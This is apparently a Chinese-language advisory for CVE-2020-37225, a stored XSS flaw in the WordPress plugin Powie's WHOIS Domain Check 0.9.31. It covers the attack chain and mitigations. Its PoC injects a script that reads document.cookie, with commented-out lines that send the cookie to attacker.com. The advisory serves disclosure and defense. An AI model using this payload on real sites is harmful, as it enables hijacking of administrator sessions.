CVE-2020-37225 Powie's WHOIS存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2020-37225

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Powie's WHOIS Domain Check

漏洞概述

Powie's WHOIS Domain Check 0.9.31版本存在存储型跨站脚本（XSS）漏洞。该漏洞允许经过身份验证的攻击者利用插件设置页面中未经净化的输入字段注入恶意JavaScript载荷。当管理员用户访问受影响的配置页面时，恶意脚本将在其浏览器上下文中执行，从而导致权限提升。

技术细节

该漏洞位于Powie's WHOIS Domain Check插件的`pwhois_settings.php`配置处理逻辑中。由于应用程序在处理用户提交的配置数据时，未对`textarea`和`input`元素中的内容实施严格的HTML实体编码或过滤，导致存在存储型XSS。攻击者只需具备低权限账户，即可在插件设置字段中构造并提交包含恶意JavaScript代码的Payload。该Payload被持久化存储在服务器端。一旦具有高权限的管理员用户访问该配置页面，嵌入的恶意脚本便会自动在管理员的浏览器上下文中执行。利用此机制，攻击者可以窃取管理员的Session ID、Cookie等敏感凭证，进而劫持管理员会话，实现权限提升或执行未授权的管理操作。

攻击链分析

STEP 1

1. 获取访问权限

攻击者使用低权限账户登录WordPress后台。

STEP 2

2. 注入恶意载荷

攻击者导航至插件设置页面，在`pwhois_settings.php`的输入框或文本区域中注入JavaScript代码并保存。

STEP 3

3. 持久化存储

恶意载荷被服务器保存，未经过滤直接存储在配置中。

STEP 4

4. 触发漏洞

当管理员用户访问该插件的设置页面时，加载的页面内容中包含恶意脚本。

STEP 5

5. 执行攻击

恶意脚本在管理员浏览器中执行，窃取Cookie或Session，导致权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC: Inject this payload into the input/textarea in pwhois_settings.php -->
<script>
  // Simulating admin cookie theft
  alert('XSS Triggered: ' + document.cookie);
  // var xhttp = new XMLHttpRequest();
  // xhttp.open("GET", "https://attacker.com/steal?c=" + document.cookie, true);
  // xhttp.send();
</script>

影响范围

Powie's WHOIS Domain Check 0.9.31

防御指南

临时缓解措施

建议暂时禁用Powie's WHOIS Domain Check插件，直到应用官方补丁。若无法禁用，应严格限制对插件设置页面的访问权限，并使用Web应用防火墙（WAF）检测和拦截潜在的XSS攻击流量。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2020-37225
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2020-37225
3 Details https://www.cvedetails.com/cve/CVE-2020-37225/
4 VulDB https://vuldb.com/cve/CVE-2020-37225
5 Link https://blog.haao.sh
6 Link https://powie.de
7 Link https://wordpress.org/plugins/powies-whois/
8 Link https://www.exploit-db.com/exploits/48656
9 Link https://www.vulncheck.com/advisories/powie-s-whois-domain-check-persistent-cross-site-scripting